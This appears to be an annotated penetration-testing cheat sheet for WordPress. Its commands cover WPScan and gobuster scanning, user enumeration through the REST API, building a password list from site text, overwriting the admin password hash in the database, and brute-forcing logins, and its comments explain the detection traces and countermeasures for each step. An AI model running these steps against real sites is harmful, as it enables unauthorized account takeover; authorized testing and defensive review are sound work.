
WordPress

General scan

# NOTE(review): in a shell, `$(target)` is command substitution (it would run a
# command named `target`). It is presumably a placeholder or Makefile-style
# variable for the base URL; a shell variable would be written "${target}".
# Baseline WPScan run against the WordPress install under /wordpress/.
wpscan --url $(target)/wordpress/
# Same scan with a WPScan API token, which lets WPScan add vulnerability data
# to its findings. A token given on the command line ends up in shell history
# and the process list; WPScan can also read it from ~/.wpscan/scan.yml.
wpscan --url $(target)/wordpress/ --api-token='...'

Directory enumeration

# Directory/file discovery: gobuster requests one path per wordlist entry and
# writes the hits to gobuster_wordpress.raw. On the server side a run like this
# appears in the access log as a burst of mostly-404 responses from one client.
gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_wordpress.raw

User enumeration

# Enumerate WordPress user names with WPScan's user enumeration option.
wpscan --url $(target) --enumerate u                   
# The REST users endpoint returns a JSON array of user objects. jq prints each
# "slug" field, and the sed expression (backslash used as the s-command
# delimiter) strips the double quotes. Slugs usually match login names, so if
# this answers an unauthenticated request the site is disclosing them;
# restricting the endpoint to authenticated users closes that source.
curl $(target)/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'

Passwords

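# Build a candidate word list from the words found on the site's own pages:
# -w names the output file, -d 1 limits the crawl to one link level.
# Site-derived words (company, product and staff names) are why a password
# policy should reject passwords built from them.
cewl -w pass.lst $(target)/wordpress/ -d 1
# Lower-case first, then sort and de-duplicate in one step. `uniq` only drops
# adjacent duplicates, so running it before `sort` (and before case folding)
# left repeated entries in pass2.lst.
tr '[:upper:]' '[:lower:]' < pass.lst | sort -u > pass2.lst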

Set the admin password to 'hacker' (direct database update)

-- Overwrites the stored password hash of the `admin` account, which requires
-- write access to the WordPress database. The value is a phpass-style hash
-- ("$P$" prefix); per the page heading it corresponds to the password 'hacker'
-- (not verified here). An unexpected change to user_pass on an administrator
-- row is the trace this leaves for incident review.
UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';

Bruteforce login

# Password-guessing run: -U and -P name the user-name and password list files.
# Every non-matching attempt is a failed login, so login rate limiting, account
# lockout and alerting on failed-login bursts are the controls that counter and
# detect this step.
wpscan --url $(target)/wordpress/ -U user.lst -P pass.lst

Search the source files for a version string

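# Recursively list the files that mention the version string.
# -F treats the pattern as a literal string: an unescaped "." is a regex
# wildcard and would also match text such as "5a9b2". `--` ends option parsing.
grep -RF -- '5.9.2' /workspace/latest/source_code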